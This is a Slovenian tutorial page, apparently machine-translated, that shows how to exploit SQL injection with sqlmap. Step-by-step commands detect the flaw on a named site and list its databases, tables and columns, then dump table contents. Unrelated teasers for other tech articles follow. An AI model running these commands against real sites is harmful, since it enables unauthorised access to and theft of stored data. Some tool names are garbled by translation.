Web6: Vbrizgavanje SQL - Nekatera orodja za izkoriščanje

Web6: Vbrizgavanje SQL - Nekatera orodja za izkoriščanje

V tem razdelku vam bo Wiki.SpaceDesktop predstavil nekaj orodij, ki se uporabljajo za izkoriščanje SQL Injection .

Trenutno obstaja veliko orodij za skeniranje varnostnih ranljivosti (vključno z vbrizgavanjem SQL). Ta orodja omogočajo precej močno odkrivanje in izkoriščanje ranljivosti vbrizgavanja SQL. Nekatera pogosto uporabljena orodja za izkoriščanje ranljivosti samodejnega vstavljanja SQL vključujejo:

  • Sqlmap
  • Krt (izkopavanje vaših podatkov)
  • Havij

Obstajajo tudi nekatera druga orodja, na katera se lahko obrnete, kot so: Netsparker, jSQL Injection, Burp, BBQSQL ...

Spodaj je predstavitev uporabe Sqlmap za izkoriščanje osnovnega vbrizgavanja SQL.

Sqlmap prenesete na http://sqlmap.org/

Sqlmap je napisan v Pythonu, zato morate za uporabo tega orodja namestiti Python. Python lahko prenesete na http://www.python.org/downloads/

Najprej morate identificirati ciljno spletno mesto, tukaj imam naslednji cilj: http://zerocoolhf.altervista.org/level1.php?id=1 (ta stran je zdaj mrtva).

1. korak : Odprite cmd in vnesite naslednji ukaz:

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”

Web6: Vbrizgavanje SQL - Nekatera orodja za izkoriščanje

sqlmap bo zaznal ciljno ranljivost in zagotovil informacije o ranljivosti.

2. korak : Ko ugotovimo, da ima ciljno spletno mesto ranljivost za vstavljanje SQL, nadaljujemo z iskanjem imena baze podatkov.

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs

Web6: Vbrizgavanje SQL - Nekatera orodja za izkoriščanje

=> Baza podatkov: my_zerocoolhf

3. korak : Ko določimo ime baze podatkov, bomo nadaljevali z iskanjem imen tabel v bazi podatkov.

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf

Web6: Vbrizgavanje SQL - Nekatera orodja za izkoriščanje

=> V bazi podatkov sta 2 tabeli: auth in book

4. korak : Določite imena stolpcev v tabeli

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book

Web6: Vbrizgavanje SQL - Nekatera orodja za izkoriščanje

=> Identificirajte stolpce v tabeli knjige: avtor, ID, cena, naslov.

5. korak : Izpis podatkov iz tabele.

python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book

Web6: Vbrizgavanje SQL - Nekatera orodja za izkoriščanje

=> Tako smo pridobili podatkovno bazo ciljne spletne strani.

Zgoraj je osnovna predstavitev uporabe sqlmap za izkoriščanje napak vbrizgavanja SQL. Več o možnostih sqlmap lahko izveste na https://github.com/sqlmapproject/sqlmap/wiki/Uporaba za podporo izkoriščanja. Izkoriščanje vbrizgavanja SQL.


4 znaki, da je čas za ponastavitev računalnika z operacijskim sistemom Windows na tovarniške nastavitve

4 znaki, da je čas za ponastavitev računalnika z operacijskim sistemom Windows na tovarniške nastavitve

Če se med zagonom sistema Windows pojavi ena ali dve napaki, ni nič posebnega, toda če pogosto naletite na težave v sistemu Windows, je morda težava v vašem operacijskem sistemu.

Kaj je predpomnilnik RAM? Kako izbrisati ta predpomnilnik v sistemu Windows?

Kaj je predpomnilnik RAM? Kako izbrisati ta predpomnilnik v sistemu Windows?

Predpomnilnik RAM omogoča hiter dostop do pogosto uporabljenih podatkov računalnika in pospeši odziv sistema. Toda kako deluje in kako ga odstraniti?

Zakaj bi morali redno znova zagnati usmerjevalnik?

Zakaj bi morali redno znova zagnati usmerjevalnik?

Kadarkoli ima vaša domača internetna povezava težave, pogosto uporabite čarobno metodo, tako da izključite usmerjevalnik, počakate nekaj minut in ga nato znova priključite. Vse se bo rešilo in omrežje bo spet stabilno delovalo kot običajno. Ste se torej kdaj vprašali, zakaj je redni ponovni zagon usmerjevalnika v tem primeru tako čudežen?

Kako ustvariti edinstvene pisave in znake v slogu made by me v sistemu Windows?

Kako ustvariti edinstvene pisave in znake v slogu made by me v sistemu Windows?

Private Character Editor (PCE) je majhen program Windows, skrit v mapi System32. Je skoraj klon MS Paint, vendar se uporablja za različne ustvarjalne namene. Če želite ustvariti lastne pisave ali ikone, je to orodje, ki ga morate uporabiti.

Navodila za uporabo Clonezille za kloniranje trdega diska Windows

Navodila za uporabo Clonezille za kloniranje trdega diska Windows

Uporabite Clonezilla za hitro in zelo preprosto kloniranje celotnega starega trdega diska na nov trdi disk. Ta članek vam bo pokazal, kako klonirati pogon Windows 10 s Clonezilla in bliskovnim pogonom USB.

Zbirka več kot 40 visokoločljivih ozadij Thanos za računalnike

Zbirka več kot 40 visokoločljivih ozadij Thanos za računalnike

Nabor ozadij Thanos v tem članku bo na voljo v vseh ločljivostih za vse računalnike in prenosnike

Razlika med protivirusnimi programi in programi proti zlonamerni programski opremi

Razlika med protivirusnimi programi in programi proti zlonamerni programski opremi

Orodja za odstranjevanje zlonamerne programske opreme in protivirusna programska oprema se med seboj dopolnjujejo in lahko delujejo skupaj, da zagotovijo maksimalno varnost na napravah uporabnikov.

Pregled FortiClient: brezplačni protivirusni program za več platform

Pregled FortiClient: brezplačni protivirusni program za več platform

FortiClient je brezplačen protivirusni izdelek podjetja Fortinet. Fortinet je znan po proizvodnji izdelkov strojne opreme za kibernetsko varnost. FortiClient je program za več platform, ki je na voljo za Windows, macOS, Linux, Windows Phone, iOS in Android.

Popravek Napaka Tega predmeta ni mogoče odpreti v sistemu Windows

Popravek Napaka Tega predmeta ni mogoče odpreti v sistemu Windows

Če uporabljate Windows, prejmete sporočilo o napaki Tega predmeta ni mogoče odpreti. Morda je bil premaknjen, preimenovan ali izbrisan, kaj naj storim? Za podrobnosti sledite spodnjemu članku.

Kaj je KRACK? Kako je KRACK zlomil varnostni protokol WPA2 WiFi

Kaj je KRACK? Kako je KRACK zlomil varnostni protokol WPA2 WiFi

Raziskovalec Mathy Vanhoef z univerze Leuven je odkril resno varnostno napako v omrežnem varnostnem protokolu Wi-Fi Protected Access II (WPA2).